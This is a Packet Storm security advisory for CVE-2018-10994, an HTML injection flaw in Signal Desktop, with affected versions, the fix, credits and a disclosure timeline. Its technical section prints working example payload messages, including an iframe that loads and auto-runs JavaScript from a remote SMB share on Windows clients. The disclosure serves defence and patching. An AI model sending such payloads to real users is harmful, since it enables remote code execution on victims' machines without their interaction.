Twenty Year Anniversary

Signal Desktop HTML Injection

Signal Desktop HTML Injection
Posted May 15, 2018
Authored by Juliano Rizzo, Alfredo Ortega, Javier Lorenzo Carlos Smaldone, Ivan Ariel Barrera Oro

Signal Desktop suffers from an HTML injection vulnerability.

tags | exploit
advisories | CVE-2018-10994
MD5 | 6ba6cba9579d623f07767c74079873cb

Signal Desktop HTML Injection

Change Mirror Download
Title: HTML tag injection in Signal-desktop

Date Published: 14-05-2018

CVE Name: CVE-2018-10994

Class: Code injection

Remotely Exploitable: Yes

Locally Exploitable: No

Vendors contacted: Signal.org

Vulnerability Description:

Signal-desktop is the standalone desktop version of the secure Signal
messenger.
This software is vulnerable to remote code execution from a malicious
contact,
by sending a specially crafted message containing HTML code that is
injected
into the chat windows (Cross-site scripting).

Vulnerable Packages:

Signal-desktop messenger v1.7.1
Signal-desktop messenger v1.8.0
Signal-desktop messenger v1.9.0
Signal-desktop messenger v1.10.0

Solution/Vendor Information/Workaround

Upgrade to Signal-desktop messenger v1.10.1, v1.11.0-beta.3.

Credits:

This vulnerability was found and researched by:
IvA!n Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and
Juliano Rizzo (@julianor), with assistance from
Javier Lorenzo Carlos Smaldone (@mis2centavos).

Technical Description - Exploit/Concept Code

12345678901234567890123456789012345678901234567890123456789012345678901234567890
While discussing a XSS vulnerability on a website using the Signal-desktop
messenger, it was found that the messenger software also displayed a
code-injection vulnerability while parsing the affected URLs.
The Signal-desktop software fails to sanitize specific html-encoded HTML
tags
that can be used to inject HTML code into remote chat windows.
Specifically the <img> and <iframe> tags can be used to include remote
or local
resources. For example, the use of iframes enables full code execution,
allowing
an attacker to download/upload files, information, etc. The <script>
tag was
also found injectable.
In the Windows operative system, the CSP fails to prevent remote
inclusion of
resources via the SMB protocol. In this case, remote execution of
JavaScript can
be achieved by referencing the script in a SMB share as the source of an
iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>.
The included javascript code is then executed automatically, without any
interaction needed from the user. The vulnerability can be triggered in the
Signal-Desktop client by sending a specially crafted message. Example
messages:

Show an iframe with some text:

http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E

Show a base64-encoded image (bypass "click to download image"):

http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e

Include and auto-execute a remote JavaScript file (for Windows
clients):

http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E

Timeline:

* 2018-05-10 18:45 GMT-3: vuln discovered

* 2018-05-11 13:03 GMT-3: emailed Signal security team

* 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch
ongoing

* 2018-05-11 16:12 GMT-3: patch committed

* 2018-05-11 18:00 GMT-3: signal-desktop update published

* 2018-05-14 18:00 GMT-3: public disclosure


References:
* Patch:
https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2...v1.11.0-beta.3
* Writeup:
https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close